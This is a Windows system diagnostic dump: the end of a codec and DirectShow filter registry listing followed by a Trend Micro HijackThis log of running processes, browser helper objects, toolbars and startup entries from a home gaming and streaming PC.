+ "vidc.VP60" "VP6 VIDEO FOR WINDOWS CODEC " "On2.com" "c:\windows\syswow64\vp6vfw.dll" "02/10/2003 20:38" ""
+ "vidc.VP61" "VP6 VIDEO FOR WINDOWS CODEC " "On2.com" "c:\windows\syswow64\vp6vfw.dll" "02/10/2003 20:38" ""
"HKLM\Software\Classes\Filter" "" "" "" "" ""
+ "Sony Amplitude Modulation" "Sony XFX 3 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack3_x64.dll" "19/08/2013 17:32" ""
+ "Sony Chorus" "Sony XFX 1 Plug-In Pack " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack1_x64.dll" "19/08/2013 17:32" ""
+ "Sony Distortion" "Sony XFX 3 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack3_x64.dll" "19/08/2013 17:32" ""
+ "Sony Dither" "Sony TrackFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sftrkfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Amplitude Modulation" "Sony ExpressFX 2 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx2_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Audio Restoration" "Sony ExpressFX Audio Restoration" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\xpvinyl_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Chorus" "Sony ExpressFX 2 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx2_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Delay" "Sony ExpressFX 2 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx2_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Distortion" "Sony ExpressFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Dynamics" "Sony ExpressFX 3 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx3_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Equalization" "Sony ExpressFX 2 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx2_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Flange/Wah-Wah" "Sony ExpressFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Graphic EQ" "Sony ExpressFX 3 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx3_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Noise Gate" "Sony ExpressFX 3 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx3_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Reverb" "Sony ExpressFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Stutter" "Sony ExpressFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony ExpressFX Time Stretch" "Sony ExpressFX 3 " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfxpfx3_x64.dll" "19/08/2013 17:33" ""
+ "Sony Flange/Wah-wah" "Sony XFX 3 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack3_x64.dll" "19/08/2013 17:32" ""
+ "Sony Gapper/Snipper" "Sony XFX 3 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack3_x64.dll" "19/08/2013 17:32" ""
+ "Sony Graphic Dynamics" "Sony XFX 2 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack2_x64.dll" "19/08/2013 17:32" ""
+ "Sony Graphic EQ" "Sony XFX 2 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack2_x64.dll" "19/08/2013 17:32" ""
+ "Sony Multi-Band Dynamics" "Sony XFX 2 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack2_x64.dll" "19/08/2013 17:32" ""
+ "Sony Multi-Tap Delay" "Sony XFX 1 Plug-In Pack " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack1_x64.dll" "19/08/2013 17:32" ""
+ "Sony Noise Gate" "Sony XFX 2 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack2_x64.dll" "19/08/2013 17:32" ""
+ "Sony Pan" "Sound Forge Pro Pan and Volume 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sffrgpnv_x64.dll" "19/08/2013 17:33" ""
+ "Sony Paragraphic EQ" "Sony XFX 2 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack2_x64.dll" "19/08/2013 17:32" ""
+ "Sony Parametric EQ" "Sony XFX 2 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack2_x64.dll" "19/08/2013 17:32" ""
+ "Sony Pitch Shift" "Sony XFX 1 Plug-In Pack " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack1_x64.dll" "19/08/2013 17:32" ""
+ "Sony Resonant Filter" "Sony Resonant Filter" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfresfilter_x64.dll" "19/08/2013 17:33" ""
+ "Sony Reverb" "Sony XFX 1 Plug-In Pack " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack1_x64.dll" "19/08/2013 17:32" ""
+ "Sony Simple Delay" "Sony XFX 1 Plug-In Pack " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack1_x64.dll" "19/08/2013 17:32" ""
+ "Sony Smooth/Enhance" "Sony XFX 3 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack3_x64.dll" "19/08/2013 17:32" ""
+ "Sony Time Stretch" "Sony XFX 1 Plug-In Pack " "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack1_x64.dll" "19/08/2013 17:32" ""
+ "Sony Track Compressor" "Sony TrackFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sftrkfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony Track EQ" "Sony TrackFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sftrkfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony Track Noise Gate" "Sony TrackFX 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sftrkfx1_x64.dll" "19/08/2013 17:33" ""
+ "Sony Vibrato" "Sony XFX 3 Plug-In Pack" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sfppack3_x64.dll" "19/08/2013 17:32" ""
+ "Sony Volume" "Sound Forge Pro Pan and Volume 1" "Sony Creative Software Inc." "c:\program files (x86)\sony\shared plug-ins\audio_x64\sffrgpnv_x64.dll" "19/08/2013 17:33" ""
"HKLM\Software\Classes\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance" "" "" "" "" ""
+ "Elgato Game Capture HD" "Video Capture Filter" "Elgato Systems GmbH" "c:\program files\elgato\gamecapture\videocapturefilter.ax" "15/09/2016 20:24" ""
+ "VHAudioDelay" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHAudioDSP" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHAudioGain" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHClockSync" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHCopyFilter" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHCropResize" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHDeinterlace" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHFrameRateConv" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHMixerSource" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHMultiReader" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHMultiWriter" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHSplitProcSource" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHStreamDelay" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHYV12Decoder" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "VHYV12Encoder" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
+ "XSplitAudioSxDSP" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\x64\vhmediacom.dll" "15/12/2015 13:02" ""
"HKLM\Software\Wow6432Node\Classes\CLSID\{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance" "" "" "" "" ""
+ "9x8Resize" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "Allocator Fix" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "Bitmap" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "Capture File Writer" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "Elgato Game Capture HD" "Video Capture Filter" "Elgato Systems GmbH" "c:\program files (x86)\elgato\gamecapture\videocapturefilter.ax" "15/09/2016 20:17" ""
+ "Frame Eater" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "LAME Audio Encoder" "LAME Audio Encoder" "" "c:\users\nathan\appdata\local\free2x\webcam recorder\dll\lame_dshow.ax" "26/11/2012 20:12" ""
+ "Microcrap MPEG-4 Video Decompressor" "Microcrap MPEG-4 Video Decompressor" "Microcrap Corporation" "c:\windows\syswow64\mpg4ds32.ax" "08/12/1999 08:19" ""
+ "Record Queue" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "Record Queue" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "ShotDetect" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "Stetch" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "VHAudioDelay" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHAudioDSP" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHAudioGain" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHClockSync" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHCopyFilter" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHCropResize" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHDeinterlace" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHFrameRateConv" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHMixerSource" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHMultiReader" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHMultiWriter" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHSplitProcSource" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHStreamDelay" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHYV12Decoder" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "VHYV12Encoder" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "Viscomsoft Screen capture filter" "" "" "c:\program files (x86)\webcam screen recorder 7.0\7.0.0.0\screensource.ax" "04/11/2007 08:44" ""
+ "WM VIH2 Fix" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "WM VIH2 Fix" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Audio Analyzer" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Audio Mixer" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Black Frame Generator" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT DirectX Transform Wrapper" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT DV Extract" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT DV Extract Filter" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "WMT Format Conversion" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Import Filter" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Interlacer" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Log Filter" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT MuxDeMux Filter" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Sample Info Filter" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "WMT Sample Info Filter" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Screen Capture filter" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Switch Filter" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "WMT Switch Filter" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Virtual Renderer" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "WMT Virtual Renderer" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Virtual Source" "Photo Gallery Video Acquisition Filters" "Microsoft Corporation" "c:\program files (x86)\windows live\photo gallery\wlxvafilt.dll" "01/04/2014 04:27" ""
+ "WMT Virtual Source" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "WMT Volume" "Movie Maker Filters" "Microsoft Corporation" "c:\program files (x86)\movie maker 2.6\wmm2filt.dll" "30/03/2007 23:37" ""
+ "XSplitAudioSxDSP" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "XSplitNdiRendererDS" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "XSplitNdiSourceDS" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
+ "XSplitWASAPIAudioRenderer" "VHMediaLib COM implementation" "SplitmediaLabs Limited" "c:\program files (x86)\splitmedialabs\xsplit broadcaster\vhmediacom.dll" "16/08/2016 11:06" ""
"HKLM\SOFTWARE\Classes\Htmlfile\Shell\Open\Command\(Default)" "" "" "" "" ""
+ "C:\Program Files\Internet Explorer\IEXPLORE.EXE" "Internet Explorer" "Microsoft Corporation" "c:\program files\internet explorer\iexplore.exe" "16/07/2016 02:17" ""
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 15:39:15, on 11/12/2016
Platform: Unknown Windows (WinNT 6.02.1008)
MSIE: Internet Explorer v11.0 (11.00.14393.0000)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\N360.exe
C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
C:\Program Files (x86)\IObit\Advanced SystemCare\Monitor.exe
C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe
C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
C:\Fraps\fraps.exe
C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe
C:\Users\Nathan\AppData\Local\Microsoft\OneDrive\OneDrive.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
C:\Program Files (x86)\Steam\bin\cef\cef.winxp\steamwebhelper.exe
C:\Users\Nathan\AppData\Roaming\Spotify\Spotify.exe
C:\Users\Nathan\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyCrashService.exe
C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyWebHelper.exe
C:\Users\Nathan\AppData\Roaming\Spotify\Spotify.exe
C:\Users\Nathan\AppData\Roaming\Spotify\Spotify.exe
C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe
C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe
C:\Users\Nathan\AppData\Local\BrowserAir\Application\BrowserAir.exe
C:\Program Files\CyberGhost 5\CyberGhost.exe
C:\Users\Nathan\AppData\Local\Discord\app-0.0.296\Discord.exe
C:\Users\Nathan\AppData\Local\Discord\app-0.0.296\Discord.exe
C:\Users\Nathan\AppData\Roaming\Spotify\SpotifyWebHelper.exe
C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCTray.exe
C:\Program Files (x86)\Origin\Origin.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Free2X\Webcam Recorder\WebcamRecorder.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
C:\Users\Nathan\AppData\Local\MEGAsync\MEGAsync.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Corsair\Corsair Utility Engine\CorsairHID.exe
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe
C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe
C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Origin\QtWebEngineProcess.exe
C:\Users\Nathan\AppData\Local\Discord\app-0.0.296\Discord.exe
C:\Program Files (x86)\GalaxyClient\GalaxyClient.exe
C:\Program Files (x86)\GalaxyClient\GalaxyClient Helper.exe
C:\Program Files (x86)\GalaxyClient\GalaxyClient Helper.exe
C:\Program Files (x86)\SuperBoost\Superb Game Boost\SuperbGameBoostMain.exe
C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\CCLibrary.exe
C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\libs\node.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Steam\bin\cef\cef.winxp\steamwebhelper.exe
C:\ProgramData\Battle.net\Agent\Agent.5331\Agent.exe
C:\Program Files (x86)\Battle.net\Battle.net.8180\Battle.net.exe
C:\Program Files (x86)\Battle.net\Battle.net.8180\Battle.net Helper.exe
C:\Program Files (x86)\Battle.net\Battle.net.8180\Battle.net Helper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\IObit\Advanced SystemCare\ASC.exe
C:\WINDOWS\SysWoW64\cmd.exe
C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\conathst.exe
C:\Users\Nathan\AppData\Local\Temp\Rar$EXa0.148\Soundnode.exe
C:\Users\Nathan\AppData\Local\Temp\Rar$EXa0.148\Soundnode.exe
C:\Users\Nathan\AppData\Local\Temp\Rar$EXa0.148\Soundnode.exe
C:\Users\Nathan\AppData\Local\Temp\Rar$EXa0.148\Soundnode.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\WINDOWS\SysWoW64\notepad.exe
C:\Users\Nathan\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE01&ocid=UE01DHP
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/p/?LinkId=255141
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = %11%\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=
O2 - BHO: See More Results Hub - {4d1e47a2-d7d2-4bb1-8fa8-2055f856c8ea} - (no file)
O2 - BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\coIEPlg.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O3 - Toolbar: Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360\Engine\22.8.1.14\coIEPlg.dll
O3 - Toolbar: Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll
O4 - HKLM\..\Run: [PowerDVD15Agent] "C:\Program Files (x86)\CyberLink\PowerDVD15\PowerDVD15Agent.exe"
